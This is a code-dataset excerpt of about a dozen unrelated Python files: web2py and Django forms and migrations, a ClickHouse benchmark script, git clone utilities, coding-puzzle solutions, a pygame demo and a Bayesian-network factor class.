'Anestesista: ',
INPUT(_type='hidden', _id='carregar_hidden_anestesia', _name='carregar_hidden_anestesia', _value=dados.anestesia),
INPUT(_type='text', _id='carregar_anestesia', _name='carregar_anestesia', _value=dados.anestesia),
BR(),
'Cirurgião: ',
INPUT(_type='hidden', _id='carregar_hidden_cirurgiao', _name='carregar_hidden_cirurgiao', _value=dados.cirurgiao),
INPUT(_type='text', _id='carregar_cirurgiao', _name='carregar_cirurgiao', _value=dados.cirurgiao),
),
BR(),
HR(),
INPUT(_type='button', _id='btn_confirmar_alteracao', _name='btn_confirmar_alteracao', _value='Confirmar Alteração'),
INPUT(_type='button', _id='btn_cancelar_alteracao', _name='btn_cancelar_alteracao', _value='Cancelar Alteração', _onclick='fn_fechar_div_alteracao()'),
)
)
)
)
)
)
return campos
def altera_dados():
    """Return 1 when at least one paciente row matches request.vars.id, else 0.

    Bug fix: the original only assigned ``dados_alterados`` inside the loop,
    so an empty result set raised NameError at the return statement.
    """
    query = db(db.paciente.id == request.vars.id).select()
    dados_alterados = 0  # default for the no-match case (was unbound before)
    for dados in query:
        dados_alterados = 1
    return dados_alterados
def index():
    """Search controller: show the search form and run the selected query.

    The hidden field ``campo_hidden_escolha_busca`` selects the search mode:
    "1" searches by patient name, "2" by registro number.  Returns the form,
    the matching rows and the row count for the view.

    Cleanup: removed the unused locals ``myconsulta``, ``dados`` and
    ``campo_h`` from the original.
    """
    linhas = ''
    qtd_linhas = 0
    busca = gerar_campos_busca()
    if busca.accepts(request, session):
        if request.vars.campo_hidden_escolha_busca == "1":
            linhas = consulta_nome(request.vars.nome_busca)
            qtd_linhas = conta_consulta(request.vars.nome_busca, 1)
        elif request.vars.campo_hidden_escolha_busca == "2":
            linhas = consulta_registro(request.vars.nr_registro_busca)
            qtd_linhas = conta_consulta(request.vars.nr_registro_busca, 2)
    return dict(busca=busca, linhas=linhas, nr_linhas=qtd_linhas)
|
994,259 | 960e00276841e7d48dc3c4df8bfc4e1f58f4de5d | #!/usr/bin/env python
import subprocess
import sys
from subprocess import PIPE
def extract(filename, table):
    """Run every query in *filename* three times via ``clickhouse-client``.

    Each non-blank line is formatted with *table* and executed with
    ``--time --format=Null``; clickhouse-client writes the elapsed time to
    stderr, which is accumulated.  Progress is printed every 100 successful
    runs, and an overall summary at the end.

    Fixes over the original:
    - the blank-line check is hoisted out of the 3x repetition loop;
    - ``communicate()`` replaces ``p.stderr.read()`` so both pipes are
      drained and the child is reaped (no deadlock / zombie processes);
    - non-numeric stderr (an error message rather than a timing) no longer
      crashes ``float()``.
    """
    overall_count = 0
    overall_time = 0
    count = 0
    time = 0
    with open(filename, 'r') as f:
        for line in f.readlines():
            if not line.strip():
                continue  # skip blank lines once, not once per repetition
            sql = line.format(table)
            for i in range(3):
                try:
                    p = subprocess.Popen(
                        ["clickhouse-client", "--time", "--format=Null", "-q", sql],
                        stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=True)
                except OSError:
                    break  # clickhouse-client not available: give up on this line
                # communicate() drains stdout and stderr and waits for the
                # child, unlike the original bare stderr.read().
                _, err = p.communicate()
                if err:
                    try:
                        elapsed = float(err)
                    except ValueError:
                        continue  # stderr held an error message, not a timing
                    time += elapsed
                    count += 1
                    overall_time += elapsed
                    overall_count += 1
                if count == 100:
                    print("count = ", count, "time = ", time)
                    time = 0
                    count = 0
    print("overall count = ", overall_count, "time = ", overall_time)
# Minimal CLI handling: require exactly two arguments, otherwise (or on
# --help) print usage.  Checking len() first avoids the IndexError the
# original raised when run with no arguments at all.
if len(sys.argv) != 3 or sys.argv[1] == '--help':
    print('benchmark.py <queries_file> <clickhouse_table>')
    exit(0)

extract(sys.argv[1], sys.argv[2])
|
994,260 | 1f1710c149810be37dbdab0536f83869e0931679 | class Solution:
def taskSchedulerII(self, tasks: 'List[int]', space: int) -> int: #O( N | N )
date = 1 #current date
d = {} #to record last time the task was performed
for t in tasks :
if t not in d or d[t] + space + 1 < date: #current task can be performed
d[t] = date
date += 1
elif d[t] + space + 1 >= date:
d[t] += space + 1
date = d[t] + 1
return date - 1 # since the date is +1 in the for..loop, the final result needs to minus 1
|
994,261 | bb77229bc913ccc8801ac5c0469b6528835e5eb6 | # Generated by Django 3.1.4 on 2020-12-19 12:36
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration for the ``clues`` app (Django 3.1.4).
    #
    # Replaces the single ``codeword`` field on the Clue model with a
    # per-player pair (``codeword_1`` / ``codeword_2``), adds matching
    # ``viewed_1`` / ``viewed_2`` flags, and relaxes the existing
    # ``is_view`` and ``view`` fields to be nullable with a ``None`` default.

    # Must be applied after the app's initial migration.
    dependencies = [
        ('clues', '0001_initial'),
    ]

    operations = [
        # Drop the old single ``codeword`` column.
        migrations.RemoveField(
            model_name='clue',
            name='codeword',
        ),
        # New per-player codeword columns (nullable CharField, default None).
        migrations.AddField(
            model_name='clue',
            name='codeword_1',
            field=models.CharField(default=None, max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='clue',
            name='codeword_2',
            field=models.CharField(default=None, max_length=255, null=True),
        ),
        # New per-player viewed flags (nullable BooleanField, default None).
        migrations.AddField(
            model_name='clue',
            name='viewed_1',
            field=models.BooleanField(default=None, null=True),
        ),
        migrations.AddField(
            model_name='clue',
            name='viewed_2',
            field=models.BooleanField(default=None, null=True),
        ),
        # Existing columns become nullable with a None default.
        migrations.AlterField(
            model_name='clue',
            name='is_view',
            field=models.BooleanField(default=None, null=True),
        ),
        migrations.AlterField(
            model_name='clue',
            name='view',
            field=models.CharField(default=None, max_length=255, null=True),
        ),
    ]
|
994,262 | 42be26907190bcfd80b5e128fd00ee007e3efc33 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
##############################################################################
###
### This file is part of the BBS software (Bioconductor Build System).
###
### Authors:
### Andrzej Oleś <andrzej.oles@embl.de>
### Hervé Pagès <hpages@fredhutch.org>
###
### Last modification: May 08, 2018
###
### gitutils module
###
import sys
import os
import bbs.jobs
import bbs.fileutils
def _create_clone(clone_path, repo_url, branch=None, depth=None):
try:
git_cmd = os.environ['BBS_GIT_CMD']
except KeyError:
git_cmd = 'git'
cmd = '%s clone' % git_cmd
if branch != None:
cmd += ' --branch %s' % branch
if depth != None:
cmd += ' --depth %s' % depth
cmd = '%s %s %s' % (cmd, repo_url, clone_path)
print "bbs.gitutils._create_clone> %s" % cmd
bbs.jobs.doOrDie(cmd)
print ""
return
def _update_clone(clone_path, repo_url, branch=None, snapshot_date=None):
    """Update an existing git clone in place (Python 2).

    Checks out *branch* (if given) then pulls; when *snapshot_date* is given
    it fetches and merges instead. Returns 0 on success or the failing git
    command's return code. Always restores the caller's working directory.
    NOTE(review): repo_url is accepted but never used here.
    """
    try:
        git_cmd = os.environ['BBS_GIT_CMD']
    except KeyError:
        git_cmd = 'git'
    old_cwd = os.getcwd()
    print "bbs.gitutils._update_clone> cd %s" % clone_path
    os.chdir(clone_path)
    print ""
    if branch != None:
        ## checkout branch
        cmd = '%s checkout %s' % (git_cmd, branch)
        print "bbs.gitutils._update_clone> %s" % cmd
        retcode = bbs.jobs.call(cmd)
        if retcode != 0:
            print "bbs.gitutils._update_clone> cd %s" % old_cwd
            os.chdir(old_cwd)
            return retcode
        print ""
    if snapshot_date == None:
        cmd = '%s pull' % git_cmd
    else:
        ## we fetch instead of pull so we can then merge up to snapshot
        ## date (see below)
        cmd = '%s fetch' % git_cmd
    print "bbs.gitutils._update_clone> %s" % cmd
    retcode = bbs.jobs.call(cmd)
    if retcode != 0:
        print "bbs.gitutils._update_clone> cd %s" % old_cwd
        os.chdir(old_cwd)
        return retcode
    print ""
    if snapshot_date != None:
        ## Andrzej: merge only up to snapshot date
        ## (see https://stackoverflow.com/a/8223166/2792099)
        ## Hervé: That doesn't seem to work reliably. Switching to a
        ## simple 'git merge' for now...
        #cmd = '%s merge `%s rev-list -n 1 --before="%s" %s`' % (git_cmd, git_cmd, snapshot_date, branch)
        cmd = '%s merge' % git_cmd
        print "bbs.gitutils._update_clone> %s" % cmd
        retcode = bbs.jobs.call(cmd)
        if retcode != 0:
            print "bbs.gitutils._update_clone> cd %s" % old_cwd
            os.chdir(old_cwd)
            return retcode
        print ""
    print "bbs.gitutils._update_clone> cd %s" % old_cwd
    os.chdir(old_cwd)
    return 0
def update_git_clone(clone_path, repo_url, branch=None, depth=None, snapshot_date=None, reclone_if_update_fails=False):
    """Ensure *clone_path* holds an up-to-date clone of *repo_url* (Python 2).

    If the clone exists, try to update it in place; on failure either abort
    the process (default) or, with *reclone_if_update_fails*, wipe the tree
    and re-clone from scratch. If the clone does not exist, create it.
    """
    if os.path.exists(clone_path):
        retcode = _update_clone(clone_path, repo_url, branch, snapshot_date)
        if retcode == 0:
            return
        print ""
        print "bbs.gitutils.update_git_clone> _update_clone() failed " + \
              "with error code %d!" % retcode
        if not reclone_if_update_fails:
            sys.exit("bbs.gitutils.update_git_clone> EXIT")
        print "bbs.gitutils.update_git_clone> ==> will try to re-create " + \
              "git clone from scratch ..."
        print "bbs.gitutils.update_git_clone> rm -r %s" % clone_path
        bbs.fileutils.nuke_tree(clone_path)
        print ""
    _create_clone(clone_path, repo_url, branch, depth)
    return
if __name__ == "__main__":
sys.exit("ERROR: this Python module can't be used as a standalone script yet")
|
994,263 | b5dd4e334e611267de1fa0eaa970be49ec7996d3 | from collections import deque
import sys
# Priority printer-queue simulation (looks like BOJ 1966 — confirm): for each
# test case, documents print in queue order but a document is sent to the back
# whenever a higher-priority one is still waiting; report when document M prints.
T = int(sys.stdin.readline())
for i in range(T):
    # N documents; M is the (0-based) queue index of the document of interest.
    N, M = map(int, sys.stdin.readline().split())
    # NOTE(review): mixes sys.stdin.readline() and input() for reading lines.
    arr = list((map(int, input().split())))
    queue = deque(enumerate(arr))  # (original_index, priority) pairs
    cnt = 0        # how many documents have printed so far
    flag = -1      # index of the last printed document (never read afterwards)
    answer = 0
    while queue:
        point = queue.popleft()
        # Print only if this document has the highest remaining priority;
        # max(arr) is recomputed each pass (O(n) per pop).
        if point[1] == max(arr):
            cnt +=1
            arr.remove(point[1])
            flag = point[0]
        else:
            queue.append(point)
        # Record the running print count the moment document M is printed.
        if point[0] == M:
            answer = cnt
    print(answer)
|
994,264 | 059210140f9fb045f348e28842e54e154414a2ce | import pygame
import sys
WHITE=(255,255,255)
BLACK=(0,0,0)
def main():
    """Run the scrolling-background walk animation in a 640x360 window.

    F1 switches to fullscreen; F2 or ESC returns to windowed mode; closing
    the window quits. The background tiles are 160px wide, so five tiles
    cover the 640px window while scrolling.
    """
    pygame.init()
    pygame.display.set_caption('My Game')
    screen=pygame.display.set_mode((640,360))
    clock=pygame.time.Clock()
    img_bg=pygame.image.load('pg_bg.png')
    img_chara=[
        pygame.image.load('pg_chara0.png'),
        pygame.image.load('pg_chara1.png'),
    ]
    tmr=0
    while True:
        tmr=tmr+1
        for event in pygame.event.get():
            if event.type==pygame.QUIT:
                pygame.quit()
                sys.exit()
            if event.type==pygame.KEYDOWN:
                if event.key==pygame.K_F1:
                    screen=pygame.display.set_mode((640,360),pygame.FULLSCREEN)
                # BUG FIX: windowed mode was restored at (600,360); every other
                # set_mode call in this program uses the 640x360 design size,
                # and the five 160px background tiles assume a 640px width.
                if event.key==pygame.K_F2 or event.key==pygame.K_ESCAPE:
                    screen=pygame.display.set_mode((640,360))
        x=tmr%160
        for i in range(5):
            screen.blit(img_bg,[i*160-x,0])
        screen.blit(img_chara[tmr%2],[224,160])
        pygame.display.update()
        clock.tick(5)
if __name__=='__main__':
main()
|
994,265 | f23464ca93b05f68f51b85ef5a37ef504933c834 | f = open("input.txt")
inp = ''
out = ''
for line in f:
#print(line)
if line[-1] == '\n':
inp += line[:-1]
else:
inp += line
def calcSize(segment):
    """Return the fully-decompressed length of *segment*.

    Markers of the form ``(AxB)`` mean: take the next A characters and
    repeat them B times. Markers inside the repeated data are expanded
    recursively; only the resulting length is computed, never the text.
    """
    total = 0
    pos = 0
    n = len(segment)
    while pos < n:
        if segment[pos] != '(':
            # Plain character: contributes exactly one to the length.
            total += 1
            pos += 1
            continue
        # Marker: locate the closing paren, parse "AxB", recurse on the
        # A-character data span, and weight its expanded size by B.
        close = segment.index(')', pos)
        length, repeat = (int(part) for part in segment[pos + 1:close].split('x'))
        data = segment[close + 1:close + 1 + length]
        total += repeat * calcSize(data)
        pos = close + 1 + length
    return total
print(calcSize(inp))  # total decompressed length of the whole input
|
994,266 | 170dca043ea496c95665e7734102bc7c462ca22c | # -*- coding:utf-8 -*-
'''
'''
from ass_module import AssModule
import ass_base
class AssBase(AssModule):
    """AssModule variant that writes basic APK info to an XML side file.

    Disables the default report printing; after the base run() completes it
    dumps application name, package name and version (taken from the
    analysis report) to "<apk_file>.xml" via ass_base.write_file.
    """
    def __init__(self):
        super(AssBase, self).__init__()
        self.print_report = False  # suppress the parent class's report output
    def run(self):
        super(AssBase, self).run()
        # NOTE(review): despite the ".xml" suffix, the payload is key=value
        # lines, not XML — confirm consumers expect this format.
        ass_base.write_file(self.apk_file+".xml", "applicationName = "+self.report.report.basic.appName+"\npackageName = "+self.report.report.basic.packageName+"\nversionName = "+self.report.report.basic.appVersion)
if __name__=="__main__":
    AssBase().main()
|
994,267 | da4aa8f0eceb76e23579dd8c7698d9e12817ae47 | from cog.models import *
from django.forms import ModelForm, ModelMultipleChoiceField, NullBooleanSelect
from django.db import models
from django.contrib.admin.widgets import FilteredSelectMultiple
from django import forms
from django.forms import ModelForm, Textarea, TextInput, Select, SelectMultiple, FileInput, CheckboxSelectMultiple
from django.core.exceptions import ObjectDoesNotExist
from os.path import basename
import re
from cog.utils import *
from django.db.models import Q
from cog.forms.forms_image import ImageForm
from cog.utils import hasText
#note parent and peer formatting is in forms_other.py
class ProjectForm(ModelForm):
    """Edit form for a CoG Project: identity, parent/peer links, logo, flags."""
    # define the widget for parent/peer selection so we can set the styling. The class is set to .selectfilter and its
    # styles are controlled in cogstyle.css
    parents = forms.ModelMultipleChoiceField("parents", required=False,
                                             widget=forms.SelectMultiple(attrs={'size': '20',
                                                                                'class': 'selectprojects'}))
    peers = forms.ModelMultipleChoiceField("peers", required=False,
                                           widget=forms.SelectMultiple(attrs={'size': '20',
                                                                              'class': 'selectprojects'}))
    # filtering of what is see in the form is done down below.
    # ERROR: FilteredSelectMultiple does not exist in the module but choosing widget=SelectMultiple throws an error.
    # FilteredSelectMultiple throws an error in IE.
    # extra field not present in model, used for deletion of previously uploaded logo
    delete_logo = forms.BooleanField(required=False)
    # specify size of logo_url text field
    logo_url = forms.CharField(required=False, widget=TextInput(attrs={'size': '80'}))
    # extra fields to manage folder state
    #folders = ModelMultipleChoiceField(queryset=Folder.objects.all(), required=False, widget=CheckboxSelectMultiple)
    # override __init__ method to change the querysets for 'parent' and 'peers'
    def __init__(self, *args, **kwargs):
        # Restrict parent/peer choices to projects on the current site or on
        # enabled peer nodes, sorted case-insensitively by short name; when
        # editing an existing project, exclude the project itself.
        super(ProjectForm, self).__init__(*args, **kwargs)
        current_site = Site.objects.get_current()
        queryset2 = Q(site__id=current_site.id) | Q(site__peersite__enabled=True)
        if 'instance' in kwargs:
            # peer and parent query-set options: exclude the project itself, projects from disabled peer nodes
            instance = kwargs.get('instance')
            queryset1 = ~Q(id=instance.id)
            self.fields['parents'].queryset = \
                Project.objects.filter(queryset1).filter(queryset2).distinct().\
                extra(select={'snl': 'lower(short_name)'}, order_by=['snl'])
            self.fields['peers'].queryset = \
                Project.objects.filter(queryset1).filter(queryset2).distinct().\
                extra(select={'snl': 'lower(short_name)'}, order_by=['snl'])
        else:
            # peer and parent query-set options: exclude projects from disabled peer nodes
            self.fields['parents'].queryset = \
                Project.objects.filter(queryset2).distinct().extra(select={'snl': 'lower(short_name)'},
                                                                   order_by=['snl'])
            self.fields['peers'].queryset = \
                Project.objects.filter(queryset2).distinct().extra(select={'snl': 'lower(short_name)'},
                                                                   order_by=['snl'])
    # overridden validation method for project short name
    def clean_short_name(self):
        # Reject reserved URL keywords, invalid characters, and (for new
        # projects only) names that collide case-insensitively with an
        # existing project.
        short_name = self.cleaned_data['short_name']
        # must not start with any of the URL matching patterns
        if short_name in ('admin', 'project', 'news', 'post', 'doc', 'signal'):
            raise forms.ValidationError("Sorry, '%s' "
                                        "is a reserved URL keyword - it cannot be used as project short name"
                                        % short_name)
        # only allows letters, numbers, '-' and '_'
        if re.search("[^a-zA-Z0-9_\-]", short_name):
            raise forms.ValidationError("Project short name contains invalid characters")
        # do not allow new projects to have the same short name as existing ones, regardless to case
        if self.instance.id is None: # new projects only
            try:
                p = Project.objects.get(short_name__iexact=short_name)
                raise forms.ValidationError("The new project short name conflicts with an existing project: %s"
                                            % p.short_name)
            except Project.DoesNotExist:
                pass
        return short_name
    def clean_long_name(self):
        # Long name must be quote-free and pure ASCII (Python 2 str.decode).
        long_name = self.cleaned_data['long_name']
        # do not allow quotation characters in long name (causes problems in browser widget)
        if '\"' in long_name:
            raise forms.ValidationError("Quotation characters are not allowed in project long name")
        # check for non-ascii characters
        try:
            long_name.decode('ascii')
        except (UnicodeDecodeError, UnicodeEncodeError):
            raise forms.ValidationError("Project long name contains invalid non-ASCII characters")
        return long_name
    class Meta:
        model = Project
        fields = ('short_name', 'long_name', 'author', 'description',
                  'parents', 'peers', 'logo', 'logo_url', 'active', 'private', 'shared',
                  'dataSearchEnabled', 'nodesWidgetEnabled',
                  'site', 'maxUploadSize')
class ContactusForm(ModelForm):
    """Form for the project's 'Contact Us' free-text sections."""
    # overridden validation method for the project contacts field
    def clean_projectContacts(self):
        value = self.cleaned_data['projectContacts']
        # hasText() rejects empty/whitespace-only content
        if not hasText(value):
            raise forms.ValidationError("Project Contacts cannot be empty")
        return value
    class Meta:
        model = Project
        fields = ('projectContacts', 'technicalSupport', 'meetingSupport', 'getInvolved')
        widgets = {'projectContacts': Textarea(attrs={'rows': 4}),
                   'technicalSupport': Textarea(attrs={'rows': 4}),
                   'meetingSupport': Textarea(attrs={'rows': 4}),
                   'getInvolved': Textarea(attrs={'rows': 4}), }
class DevelopmentOverviewForm(ModelForm):
    """Single-field form for editing the project's development overview."""
    class Meta:
        model = Project
        widgets = {'developmentOverview': Textarea(attrs={'rows': 8})}
        fields = ('developmentOverview',)
class SoftwareForm(ModelForm):
    """Form for the project's software description fields."""
    class Meta:
        model = Project
        widgets = {'software_features': Textarea(attrs={'rows': 8}),
                   'system_requirements': Textarea(attrs={'rows': 8}),
                   'license': Textarea(attrs={'rows': 1}),
                   'implementationLanguage': Textarea(attrs={'rows': 1}),
                   'bindingLanguage': Textarea(attrs={'rows': 1}),
                   'supportedPlatforms': Textarea(attrs={'rows': 8}),
                   'externalDependencies': Textarea(attrs={'rows': 8}),
                   }
        fields = ('software_features', 'system_requirements', 'license',
                  'implementationLanguage', 'bindingLanguage', 'supportedPlatforms', 'externalDependencies')
    def clean(self):
        # software_features is effectively required: attach a field error
        # when it is empty/whitespace-only.
        features = self.cleaned_data.get('software_features')
        if not hasText(features):
            self._errors["software_features"] = self.error_class(["'SoftwareFeatures' must not be empty."])
            print 'error'  # NOTE(review): looks like a leftover debug print
        return self.cleaned_data
class UsersForm(ModelForm):
    """Single-field form for editing the project's 'getting started' text."""
    class Meta:
        model = Project
        widgets = {'getting_started': Textarea(attrs={'rows': 12}), }
        fields = ('getting_started', )
class ProjectTagForm(ModelForm):
    """Form for creating/renaming a ProjectTag and selecting existing tags."""
    # since this is the base form, we don't have access to the project's specific tags. The form is initialized in the
    # form constructor in views_project.py
    # field['tags'] is the list of preexisting tags
    tags = forms.ModelMultipleChoiceField("tags", required=False,
                                          widget=forms.SelectMultiple(attrs={'size': '7'}))
    # override __init__ method to change the queryset for 'tags'
    def __init__(self, *args, **kwargs):
        super(ProjectTagForm, self).__init__(*args, **kwargs)
        self.fields['tags'].queryset = ProjectTag.objects.all().order_by('name')
    class Meta:
        model = ProjectTag
        fields = ('tags', 'name')
        widgets = {'name': TextInput, }
    #override clean function
    def clean(self):
        # Duplicate names (case-insensitive) are rejected; brand-new names are
        # additionally checked for invalid characters and maximum length.
        # Errors are attached to the 'name' field rather than raised.
        name = self.cleaned_data['name']
        try:
            tag = ProjectTag.objects.get(name__iexact=name)
            # check tag with same name (independently of case) does not exist already
            if tag is not None and tag.id != self.instance.id: # not this tag
                self._errors["name"] = self.error_class(["Tag with this name already exist: %s" % tag.name])
        except ObjectDoesNotExist:
            # capitalize the tag name - NOT ANY MORE SINCE WE WANT TO CONSERVE CASE
            #self.cleaned_data['name'] = self.cleaned_data['name'].capitalize()
            # only allow letters, numbers, '-' and '_'
            if re.search("[^a-zA-Z0-9_\-\s]", name):
                self._errors["name"] = self.error_class(["Tag name contains invalid characters"])
            # impose maximum length
            if len(name) > MAX_PROJECT_TAG_LENGTH:
                self._errors["name"] = self.error_class(["Tag name must contain at most %s characters"
                                                         % MAX_PROJECT_TAG_LENGTH])
        return self.cleaned_data
|
994,268 | 6959e82dfb1e2a2b7eaf08e962f42ed370908bb4 | # Cracking the Coding Interview
# p 79 - converting between hex and binary
# 3/11/2016
# @totallygloria
def convert_10(num, base):
    """Interpret digit string *num* in the given *base* and return its
    decimal (base-10) integer value.

    Digits above 9 are the uppercase letters A-Z, supporting bases up
    to 36. Raises ValueError (via str.index) on a digit that is not in
    the lookup alphabet.
    """
    digits = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    # Horner's method: fold left-to-right instead of summing base**i terms.
    value = 0
    for ch in num:
        value = value * base + digits.index(ch)
    return value
def compare_nums(num1, base1, num2, base2):
    """Compare two digit strings expressed in (possibly different) bases.

    Returns True/False according to whether they denote the same integer,
    or None when either base falls outside the supported 2..35 range.
    """
    for base in (base1, base2):
        if base < 2 or base > 35:
            return None
    return convert_10(num1, base1) == convert_10(num2, base2)
# Ad-hoc smoke tests (Python 2 print statements). Expected output:
# None for out-of-range bases (first two and last-but-two lines vary),
# True/False for the in-range comparisons.
print compare_nums("110", 1, "0", 16)
print compare_nums("110", 2, "0", 59)
print compare_nums("0", 2, "0", 16)
print compare_nums("5", 10, "5", 10)
print compare_nums("111", 2, "7", 16)
print compare_nums("167", 10, "A7", 16)
print compare_nums("11100111", 2, "E7", 16)
print compare_nums("110111", 2, "B4", 16)
print compare_nums("1110011", 4, "E", 16)
print compare_nums("110111", 2, "E7", 12)
"""
Problems in the first run:
* Tried to do a dict-like look-up, instead of using .index
* Used a stack and then needed a second loop to unpack it
* forgot to convert the values with str()
* almost forgot to add the last value (the second add outside of the loop)
* had to solve the binary part by hand by counting it out to figure out order
* some basic syntax errors (all caught immediately, but need to be more careful)
* Doesn't work, you need to use a stack!
Problems with second try:
* didn't check if the base < 2 or greater than the lookup index
* tried to name the variable sum, which is a reserved word
* counted UP the digits, instead of down
* Added a return None inside the comparison funct to return None instead
of calling the convert function if the bases are out of range
"""
|
994,269 | f8d1e6567bbefc5bb0d1e348984bdb9c264d8ea5 | # -*- coding: utf-8 -*-
from flectra import http
# class YkpAbsen(http.Controller):
# @http.route('/ykp_absen/ykp_absen/', auth='public')
# def index(self, **kw):
# return "Hello, world"
# @http.route('/ykp_absen/ykp_absen/objects/', auth='public')
# def list(self, **kw):
# return http.request.render('ykp_absen.listing', {
# 'root': '/ykp_absen/ykp_absen',
# 'objects': http.request.env['ykp_absen.ykp_absen'].search([]),
# })
# @http.route('/ykp_absen/ykp_absen/objects/<model("ykp_absen.ykp_absen"):obj>/', auth='public')
# def object(self, obj, **kw):
# return http.request.render('ykp_absen.object', {
# 'object': obj
# }) |
994,270 | 8cbf306c26051ab2a49edc620aabe343760c6549 | # Copyright (c) 2012, CyberPoint International, LLC
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the CyberPoint International, LLC nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL CYBERPOINT INTERNATIONAL, LLC BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''This module provides tools for creating and using an individual
factorized representation of a node. See description of factorized
representations in :doc:`tablecpdfactorization`.
'''
def prod(l):
    """Return the product of all elements of the iterable *l*.

    An empty iterable yields the multiplicative identity, 1.
    """
    result = 1
    for factor in l:
        result = result * factor
    return result
class TableCPDFactor:
    """Factorized representation of a CPD table.
    This class represents a factorized representation of a conditional
    probability distribution table.
    """
    def __init__(self, vertex, bn):
        '''Construct a factorized CPD table from a vertex in a discrete
        Bayesian network.
        This class is constructed with a
        :doc:`DiscreteBayesianNetwork <discretebayesiannetwork>`
        instance and a *vertex* name as arguments. First it stores
        these inputs in *inputvertex* and *inputbn*. Then, it creates
        a factorized representation of *vertex*, storing the values in
        *vals*, the names of the variables involved in *scope* the
        cardinality of each of these variables in *card* and the
        stride of each of these variables in *stride*.
        '''
        self.inputvertex = vertex
        '''The name of the vertex.'''
        self.inputbn = bn
        '''The :doc:`DiscreteBayesianNetwork <discretebayesiannetwork>` instance that the vertex lives in.'''
        self.vals = []
        '''A flat array of all the values from the CPD.'''
        self.stride = {}
        '''A dict of {vertex: value} pairs for each vertex in *self.scope*, where vertex is the name of the vertex and value is the self.stride of that vertex in the *self.vals* array.'''
        self.card = []
        '''A list of the self.cardinalities of each vertex in self.scope, where cardinality is the number of values that the vertex may take. The cardinalities are indexed according to the vertex's index in *scope*.'''
        self.scope = []
        '''An array of vertices that affect the self.vals found in *vals*. Normally, this is the node itself and its parents.'''
        root = bn.Vdata[vertex]["cprob"]
        parents = bn.Vdata[vertex]["parents"]
        # add values
        # Recursively walk every combination of parent values (in Vdata
        # order) and flatten the nested cprob dict into self.vals.
        def explore(_dict, key, depth, totaldepth):
            if depth == totaldepth:
                for x in _dict[key]:
                    self.vals.append(x)
                return
            else:
                for val in bn.Vdata[parents[depth]]["vals"]:
                    ckey = key + (val,)
                    explore(_dict, ckey, depth+1, totaldepth)
        if not parents:
            # Root node: cprob is already the flat distribution; sanity-check
            # its length and that it sums to 1 (within float tolerance).
            self.vals = bn.Vdata[vertex]["cprob"]
            assert len(self.vals) == len(bn.Vdata[vertex]["vals"])
            assert abs(sum(self.vals) - 1) < 1e-8
        else:
            td = len(parents)
            explore(root, (), 0, td)
        # add self.cardinalities
        self.card.append(len(bn.Vdata[vertex]["vals"]))
        if (bn.Vdata[vertex]["parents"] != None):
            for parent in reversed(bn.Vdata[vertex]["parents"]):
                self.card.append(len(bn.Vdata[parent]["vals"]))
        # add self.scope
        self.scope.append(vertex)
        if (bn.Vdata[vertex]["parents"] != None):
            for parent in reversed(bn.Vdata[vertex]["parents"]):
                self.scope.append(parent)
        # add self.stride: the index step in the flat vals array for each
        # variable in scope (first variable varies fastest).
        t_stride = 1
        self.stride = dict()
        for x in range(len(self.scope)):
            self.stride[self.scope[x]] = (t_stride)
            t_stride *= len(bn.Vdata[self.scope[x]]["vals"])
    def multiplyfactor(self, other): # cf. PGM 359
        '''Multiply this factor by another Factor
        Multiplying factors means taking the union of the scopes, and
        for each combination of variables in the scope, multiplying
        together the probabilities from each factor that that
        combination will be found.
        Arguments:
            1. *other* -- An instance of :doc:`TableCPDFactor <tablecpdfactor>` class representing the factor to multiply by.
        Attributes modified:
            *vals*, *scope*, *stride*, *t_card* -- Modified to reflect the data of the new product factor.
        For more information cf. Koller et al. 359.
        '''
        # merge t_scopes: union of both scopes, keeping this factor's order
        scope = self.scope
        card = self.card
        for t_scope, t_card in zip(other.scope, other.card):
            try:
                scope.index(t_scope)
            except:
                scope.append(t_scope)
                card.append(t_card)
        # algorithm (see book): odometer-style walk over every joint
        # assignment, advancing index j into self.vals and k into other.vals
        # only for the variables each factor actually contains.
        assignment = {}
        vals = []
        j = 0
        k = 0
        for _ in range(prod(card)):
            vals.append(
                self.vals[j] * other.vals[k])
            for t_card, t_scope in zip(card, scope):
                assignment[t_scope] = assignment.get(t_scope, 0) + 1
                if (assignment[t_scope] == t_card):
                    # this digit rolled over: rewind its contribution
                    assignment[t_scope] = 0
                    if t_scope in self.stride:
                        j = j - (t_card - 1) * self.stride[t_scope]
                    if t_scope in other.stride:
                        k = k - (t_card - 1) * other.stride[t_scope]
                else:
                    if t_scope in self.stride:
                        j = j + self.stride[t_scope]
                    if t_scope in other.stride:
                        k = k + other.stride[t_scope]
                    break
        # add strides for the merged scope
        t_stride = 1
        stride = {}
        for t_card, t_scope in zip(card, scope):
            stride[t_scope] = (t_stride)
            t_stride *= t_card
        self.vals = vals
        self.scope = scope
        self.card = card
        self.stride = stride
    def reducefactor(self, vertex, value=None):
        '''Sum out the variable specified by *vertex* from the factor.
        Summing out means summing all sets of entries together where
